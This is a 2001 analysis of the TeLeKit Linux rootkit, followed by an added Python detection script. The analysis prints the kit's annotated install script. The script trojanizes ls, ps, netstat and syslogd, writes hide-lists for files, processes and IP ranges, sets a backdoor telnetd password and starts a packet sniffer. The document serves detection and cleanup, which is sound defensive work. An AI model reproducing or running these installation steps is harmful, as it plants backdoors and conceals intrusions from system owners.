Date of analysis: 28/05/01
Author: Fredrik [ press@alldas.de ]
Description: Linux rootkit ( TeLeKit )

-----[ Disclaimer

Information revealed in this and other analyses is in no way meant to contribute to illegal actions such as hacking or other forms of computer crime. It should serve as an informative source to prevent actions like those mentioned above.

-----[ Introduction

This rootkit was sent to us by an anonymous source. We will try to explain in short terms what a rootkit like this does and how you know if you are infected.

The binaries are from the famous Linux rootkit (lrk) and the control files are the default ones used. Pretty stupid. It seems that the author of this kit is from Romania, and that also applies to the "yoyo.tar.gz" rootkit. Based on the IP ranges, the language used and the e-mail addresses I would say that these authors are from Romania.

These are the files that come with TeLeKit (TeLeKiT.tar.gz, 413643 bytes):

fredrik@slaptop:~/analys/TeLeKiT$ ls -al
total 24
drwxr-xr-x   3 fredrik  users    4096 Sep 27  2000 ./
drwxr-xr-x   3 fredrik  users    4096 May 26 11:05 ../
-rwxr-xr-x   1 fredrik  users    4836 Oct 14  2000 TeLe*
-rwxr-xr-x   1 fredrik  users    3664 Oct 14  2000 UnTeLe*
drwxr-xr-x   2 fredrik  users    4096 Oct 14  2000 bin/

fredrik@slaptop:~/analys/TeLeKiT$ ls -al bin
total 1132
drwxr-xr-x   2 fredrik  users    4096 Oct 14  2000 ./
drwxr-xr-x   3 fredrik  users    4096 Sep 27  2000 ../
-rwxr-xr-x   1 fredrik  users   17293 Oct 14  2000 cl*
-rwxr-xr-x   1 fredrik  users  138288 Sep 27  2000 dir*
-rwxr-xr-x   1 fredrik  users  101924 Sep 27  2000 du*
-rwxr-xr-x   1 fredrik  users   52984 Sep 27  2000 find*
-rwxr-xr-x   1 fredrik  users   19840 Sep 27  2000 ifconfig*
-rwxr-xr-x   1 fredrik  users    2443 Oct 14  2000 illusion*
-rwxr-xr-x   1 fredrik  users    9712 Sep 27  2000 killall*
-rwxr-xr-x   1 fredrik  users  138283 Sep 27  2000 ls*
-rwxr-xr-x   1 fredrik  users   30968 Sep 27  2000 netstat*
-rwxr-xr-x   1 fredrik  users   28952 Sep 27  2000 ps*
-rwxr-xr-x   1 fredrik  users   32281 Sep 27  2000 pstree*
-rwxr-xr-x   1 fredrik  users    7229 Sep 27  2000 sniff*
-rwxr-xr-x   1 fredrik  users  235516 Sep 27  2000 syslogd*
-rwxr-xr-x   1 fredrik  users   14140 Sep 27  2000 tcpd*
-rwxr-xr-x   1 fredrik  users   12812 Oct  6  2000 teleulo*
-rwxr-xr-x   1 fredrik  users   48472 Sep 27  2000 telnetd*
-rwxr-xr-x   1 fredrik  users   47604 Sep 27  2000 top*
-rwxr-xr-x   1 fredrik  users   17139 Oct  6  2000 vanish*
-rwxr-xr-x   1 fredrik  users  138289 Sep 27  2000 vdir*

MD5SUM output -

TeLeKiT/
79dfb94a7e8b1b72027cfef891d2d25d  TeLe
fb19c40c2ff6afe3ec8eff767441185d  UnTeLe

TeLeKiT/bin
7629f303efcd7bf6333fdfa2bb499bd7  cl
08e247c82fdda2e871a22bbd2ea2eaeb  dir
19fd6e38a309ac6524d34b39bc114a81  du
e8bc310456a5ba681023175e9ca7d9c8  find
086394958255553f6f38684dad97869e  ifconfig
4b13d54d6136d4c3b0e07465cc2c7cb0  illusion
d550ddeefac00dbcb9c6814d1e7f6778  killall
21545b685113702b96ebe790f86606c1  ls
e55ccb642481597c91e91133f787bcc8  netstat
6956facc98a5a123e2ae625dd79e11ad  ps
fe90f2d978e23e53c393c5130a70fe67  pstree
c3496d9f286968cd94e4fa64d4942b57  sniff
fef94c5c33606142f26e0aabd91e2485  syslogd
9f508129eba684fa40aba537d30a5fe4  tcpd
cee2e00b96eb10a2b0e295be028fb48f  teleulo
b3e7b3556df52aeb5e1442f676f30140  telnetd
62180f6b59b96526a50f2b38ff3ca544  top
224e10a2ca4eb9adc5ee8e168ef675a3  vanish
f0c9c1b1a5927d2aa59b243cec198fc5  vdir

-----[ Main

I will start by displaying the start file TeLe, which obviously installs the rootkit on the compromised machine. (My own comments are in "[ ]".)

#!/bin/bash

BINARYDIR="bin"                                    [ where the trojaned binaries are located ]
BACKUP="/usr/man/man3/.../TeLeKiT/backup/"         [ where the backup binaries will be placed ]
LS="/bin/ls"                                       [ the paths to the real binaries ]
DIR="/usr/bin/dir"
VDIR="/usr/bin/vdir"
DU="/usr/bin/du"
FIND="/usr/bin/find"
PS="/bin/ps"
TOP="/usr/bin/top"
PSTREE="/usr/bin/pstree"
IFCONFIG="/sbin/ifconfig"
NETSTAT="/bin/netstat"
KILLALL="/usr/bin/killall"
SYSLOGD="/usr/sbin/syslogd"
SNIFF="/usr/man/man3/.../TeLeKiT/bin/sniff"        [ where to install the sniffer ]
TELNETD="/usr/man/man3/.../TeLeKiT/bin/telnetd"    [ where the real in.telnetd is stored ]
TELEULO="/usr/man/man3/.../TeLeKiT/bin/teleulo"    [ where the real /bin/login is stored ]

echo ""
echo "############# TeLeKiT ###############"
echo ""
echo "[*] Coded bY TeLe"                           [ the author puts his name on the kit ]
echo "[*] V3rS|on: 1.0 F|n4L Rul3Z!"
echo "[*] R00tKit: lrk6.tar.gz modified by vejeta99"    [ lrk based ]
echo "[*] BaCkUP DiR: $BACKUP"
echo ""
echo "############# STARTING ##############"
echo ""

[ I will not include every part of this file as it is very long; this example goes for all the binaries ]

if [ ! -f "$LS" ]; then
    echo "[!] file $LS not 3Xist ... sKipPing"
else
    cp $LS $BACKUP                                 [ backing up the real binary ]
    touch -a -m -r $LS $BINARYDIR/ls               [ touch'ing the trojan so it carries the real binary's date & time ]
    cp $BINARYDIR/ls $LS                           [ replacing the binary ]
    echo "[*] file $LS proc3ssed ... OK"
fi

cp /usr/man/man3/.../TeLeKiT/bin/illusion /usr/man/man3/.../
cp /usr/man/man3/.../TeLeKiT/bin/cl /usr/man/man3/.../cl    [ fixing the rootkit files ]

cat > /dev/ptyr << EOF                             [ file hiding; will hide all files containing these strings ]
...
rstv
TeLeKiT
lsniff
tcp.log
ptyr
ptyp
ptyq
hda06
EOF
echo "[*] file /dev/ptyr proc4ssed ... OK"

cat > /dev/ptyp << EOF                             [ process hiding file; hides everything containing *sniff*, *sh*, *in.telnetd ]
3 sniff
3 sh
3 in.telnetd
EOF
echo "[*] file /dev/ptyp proc4ssed ... OK"

cat > /dev/ptyq << EOF                             [ netstat hiding; hides connections from/to 202.96 & 213.197 ]
1 202.96
1 213.197
2 202.96
2 213.197
3 213.197
3 202.96
EOF
echo "[*] file /dev/ptyq proc4ssed ... OK"

cat > /dev/hda06 << EOF                            [ config file for the in.telnetd trojan; the password seems to be teler0x ]
passwd teler0x
shell /bin/bash
term linux
EOF
echo "[*] file /dev/hda06 proc4ssed ... OK"

if [ ! -f "$SNIFF" ]; then
    echo "[!] file $SNIFF not 3Xist ... sKipPing"
else
    mkdir /usr/man/man3/.../lsniff                 [ installing the sniffer ]
    cp $SNIFF /usr/man/man3/.../lsniff/
    cd /usr/man/man3/.../lsniff/
    ./sniff &                                      [ starting the sniffer; this will probably show up in the logs ]
    echo "[*] file $SNIFF proc4ssed ... OK"
fi

echo ""
echo "############# ..DONE.. ##############"
echo ""
[ end of installation script ]

-----[ File summary

TeLeKiT/ =>
  TeLe   = installation script.
  UnTeLe = rootkit removal script.

TeLeKiT/bin/ =>
  dir/du/find/ls/vdir = file hiding trojans; the control file is /dev/ptyr.
  cl            = utmp/wtmp/lastlog/logfile cleaner.
  ifconfig      = ifconfig trojan to hide promiscuous mode when sniffing.
  illusion      = log cleaner to clean up all logs, uses the cl binary. Made by TeLe.
  killall       = trojaned version so the applications specified in /dev/ptyp can't be killed.
  netstat       = hides all connections/ports specified in /dev/ptyq.
  ps/pstree/top = hide the processes listed in /dev/ptyp.
  sniff         = normal linsniffer, stores the log in a file called tcp.log.
  syslogd       = trojaned version of syslogd, won't log things specified in /dev/ptys.
  teleulo       = /bin/login replacement to log in using a special exported DISPLAY password.
  telnetd       = trojaned version of telnetd, uses the password teler0x.
  tcpd          = will bypass hosts.deny for the hosts listed in /dev/ptyq.
  vanish        = another log cleaner.

-----[ Am I infected ? How do I clean up ?

Q: Am I infected ?
A: If /usr/man/man3/.../TeLeKiT exists on some of your Linux machines you are probably infected. Good advice is also to run strings on binaries such as /bin/ps, /bin/ls and /bin/netstat and check for pty* patterns. Example:

fredrik@slaptop:~/analys/TeLeKiT$ strings /bin/ps| grep pty
/dev/ptyp

Q: How do I clean up ?
A: As always when a computer is penetrated, a reinstallation is needed. If that is not possible at the time, you should be able to use the clean-up script that is available here.

-----[ Conclusion

This rootkit is developed and compiled for Linux. It's a pretty big kit. It replaces many binaries and doesn't clean up well afterwards.
The strangest thing is that this rootkit doesn't patch any security holes. It simply installs itself and leaves all holes open. It's very common in the hacking scene to close all holes after you've backdoored a computer so no one else can come in, but this kit doesn't seem to do that. Software like Tripwire would probably notice the file changes in time, especially since this rootkit backdoors so many binaries. However, keep your servers updated with the latest patches at all times and attacks will hopefully not be successful.

Thank you for reading.

Fredrik Östergren.
press@alldas.de
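The checks from the "Am I infected?" section (the kit directory, the strings-for-pty check on ps/ls/netstat, the md5sum listing) can be combined with a cross-view comparison that relies on the fact that this kit replaces user-space binaries rather than hooking the kernel: os.listdir and /proc are answered by the kernel, so anything the trojaned ls or ps drops from its output still shows up there. The following is an added example and not part of the original analysis; the three hashes are taken from the md5sum listing above, KIT_DIR is the path used by the install script, and the fake "binary" and temporary directory in demo_constructed() are constructed for the self-test.

```python
"""Checks for the user-space binary replacements this kit installs.

Added example, not part of the alldas.de write-up. Assumes a Linux host with
/proc mounted and ls/ps in PATH; the sample 'binary' in demo_constructed() is
constructed for the self-test and is not one of the kit's files.
"""
import hashlib
import os
import re
import subprocess
import tempfile

# Directory the TeLe install script creates for its backups and the sniffer.
KIT_DIR = "/usr/man/man3/.../TeLeKiT"

# MD5 sums of three replaced binaries, copied from the kit's md5sum listing.
# A hash match only catches this exact build, so treat it as a weak signal.
KNOWN_BAD_MD5 = {
    "21545b685113702b96ebe790f86606c1": "TeLeKiT ls",
    "e55ccb642481597c91e91133f787bcc8": "TeLeKiT netstat",
    "6956facc98a5a123e2ae625dd79e11ad": "TeLeKiT ps",
}

# Control files the trojaned binaries read their hide lists and the telnetd
# password from. A clean ls/ps/netstat has no reason to contain these strings;
# the lookahead keeps ordinary BSD pty device names like /dev/ptyp0 from matching.
CONTROL_FILE_RE = re.compile(rb"/dev/(?:pty[pqrs]|hda06)(?![0-9A-Za-z])")


def control_file_strings(data):
    """The 'strings <binary> | grep pty' check, applied to the raw bytes of a binary."""
    return sorted({m.decode() for m in CONTROL_FILE_RE.findall(data)})


def md5_of(path):
    h = hashlib.md5()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def hidden(visible, actual):
    """Cross-view diff: entries the kernel reports that the (possibly replaced) tool omits."""
    return set(actual) - set(visible)


def hidden_files(path):
    """Compare getdents(2) via os.listdir against whatever 'ls' is in PATH.
    Names matching /dev/ptyr entries ('...', 'tcp.log') would be missing on the ls side only."""
    via_ls = subprocess.run(["ls", "-A1", "--", path], capture_output=True,
                            text=True, check=True).stdout.splitlines()
    return hidden(via_ls, os.listdir(path))


def hidden_pids():
    """Compare /proc against ps. /proc is read first so that a process which exits
    between the two snapshots is dropped by the re-check instead of reported as hidden."""
    in_proc = {int(n) for n in os.listdir("/proc") if n.isdigit()}
    out = subprocess.run(["ps", "-eo", "pid="], capture_output=True, text=True, check=True).stdout
    in_ps = {int(t) for t in out.split()}
    return {p for p in hidden(in_ps, in_proc) if os.path.isdir(f"/proc/{p}")}


def check_binary(path):
    """Findings for one binary: embedded control-file names plus a known-bad hash match, if any."""
    with open(path, "rb") as f:
        strings = control_file_strings(f.read())
    return {"control_files": strings, "known_bad": KNOWN_BAD_MD5.get(md5_of(path))}


def demo_constructed():
    """Self-test on constructed data: a fake binary embedding '/dev/ptyp' (as the kit's
    ps does) and a temp directory where ls and os.listdir must agree on a clean host."""
    with tempfile.TemporaryDirectory() as d:
        fake = os.path.join(d, "ps")
        with open(fake, "wb") as f:
            f.write(b"\x7fELF\x00/dev/ptyp\x00/dev/ptyp0\x00/dev/hda06\x00")
        for name in ("tcp.log", "...", "normal.txt"):  # names the kit's /dev/ptyr would hide
            open(os.path.join(d, name), "w").close()
        return {"binary": check_binary(fake), "hidden_files": hidden_files(d)}


if __name__ == "__main__":
    if os.path.isdir(KIT_DIR):
        print("kit directory present:", KIT_DIR)
    for b in ("/bin/ls", "/bin/ps", "/bin/netstat", "/usr/sbin/syslogd"):
        if os.path.exists(b):
            print(b, check_binary(b))
    if os.path.isdir("/usr/man/man3"):
        print("files hidden from ls in /usr/man/man3:", hidden_files("/usr/man/man3"))
    print("pids hidden from ps:", hidden_pids())
    print("self-test:", demo_constructed())
```

Run it from a known-good shell (or a rescue medium) because the checks call the ls and ps found in PATH on purpose: the interesting result is a non-empty set from hidden_files() or hidden_pids(). The cross-view approach catches lrk-style binary replacements like this kit, but not a kernel-module rootkit that filters /proc and getdents for every caller, and the hash lookup only identifies this particular build; the embedded /dev/pty* strings are the more durable signal across lrk variants.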